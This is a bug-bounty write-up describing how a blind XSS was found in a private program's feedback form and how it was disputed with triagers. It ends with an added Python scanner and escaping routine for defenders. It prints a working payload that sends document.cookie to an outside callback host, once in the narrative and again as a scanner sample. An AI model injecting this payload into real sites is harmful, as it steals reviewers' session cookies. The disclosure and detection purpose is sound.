N/a to $750 bounty for a Blind XSS.
Without wasting any time, I will try to keep everything to the point.
It’s a private program, so we call it www.target.com.
Vulnerable form: Feedback form on www.target.com
I use www.blindf.com to find the blind XSS. You can use your own VPS to receive the callbacks instead.
My methodology to find the BXSS:
My experience says that the basic BXSS payload
often does not work. Any other payload that extracts the DOM or the page source often does not work either. So to find the BXSS, I use blind HTML payloads.
How I found this bug:
- I used the BHTML payload
in every text field of the feedback form on www.target.com/feedback.
- After some days, www.blindf.com received a response from the vulnerable server.
- I went ahead and put the basic BXSS payload
to find the BXSS, because at this point I knew that the form was vulnerable.
- I waited for 20 days but did not receive a response.
- Then I used a trick. I put the blind HTML payload
and submitted the form. Then I resubmitted the form with my basic BXSS payload. That means I submitted the form twice: the first time with the BHTML payload and the second time with the BXSS payload.
- After some time, I received a response from my BHTML payload, but the BXSS payload did not send any response. I understood that my BXSS payload had failed and would not send any response now, because both payloads were submitted on the same day and should have fired at the same time.
- www.blindf.com provides other payloads too, with minimal JS execution. I used a different payload that only extracts cookies and not any DOM values from the page:
"><img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>
- This payload was executed and I received the basic cookie.
- Bug submitted.
- The triager tried to reproduce the bug but failed, so he closed my bug as N/a.
- I raised the issue. Another triager used a famous website that is used to find the BXSS but did not receive any response.
- Closed as N/a again.
- I raised the issue again and provided my www.blindf.com account credentials to him to reproduce the bug.
- I asked him to fill out the form twice, the first time with the BHTML payload and the second time with the BXSS (Cookie extraction) payload.
- Payloads were executed and www.blindf.com received the response from both payloads.
- Bounty received: $750.
So, after my bug was closed as N/a two times, I finally received the bounty.
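From the defending side, the root cause here is that feedback text is rendered unescaped in whatever back-office page the staff uses to read it, and the first sign is usually a stored record whose markup references an outside host. The following is an added example (not from the original post or the program) that escapes feedback before display and scans stored entries for such callbacks; the allowed host list and the sample records are constructed assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the feedback page itself is allowed to reference (assumption).
ALLOWED_HOSTS = {"www.target.com"}


class CallbackScanner(HTMLParser):
    """Flags markup that would make a reviewer's browser contact a foreign
    host (src/href/action/data to another origin) or run script (on* handlers).
    This catches both the script-free 'blind HTML' probe and the JS payload."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"<{tag}> has event handler {name}")
            elif name in ("src", "href", "action", "data"):
                host = urlparse(value.strip()).hostname
                if host and host not in ALLOWED_HOSTS:
                    self.findings.append(f"<{tag}> {name} points to {host}")


def scan_feedback(text):
    """Return the list of findings for one stored feedback string."""
    scanner = CallbackScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def render_feedback(text):
    """Escape feedback before placing it in the reviewer's page, so a submitted
    tag is displayed as text instead of being parsed as markup."""
    return html.escape(text, quote=True)


# Constructed sample records: the cookie payload from the write-up, a
# script-free blind HTML probe, and a benign entry.
SAMPLES = [
    "\"><img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>",
    "<img src=https://blindf.com/probe.png>",
    "Your checkout page shows the wrong total.",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan_feedback(s) or "clean", "|", render_feedback(s)[:60])
```

Running the scanner over the stored feedback table on a schedule is a cheap way to notice a probe like the BHTML one above before the JS variant ever fires.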
Thank you for reading my boring stuff and tolerating my bad English.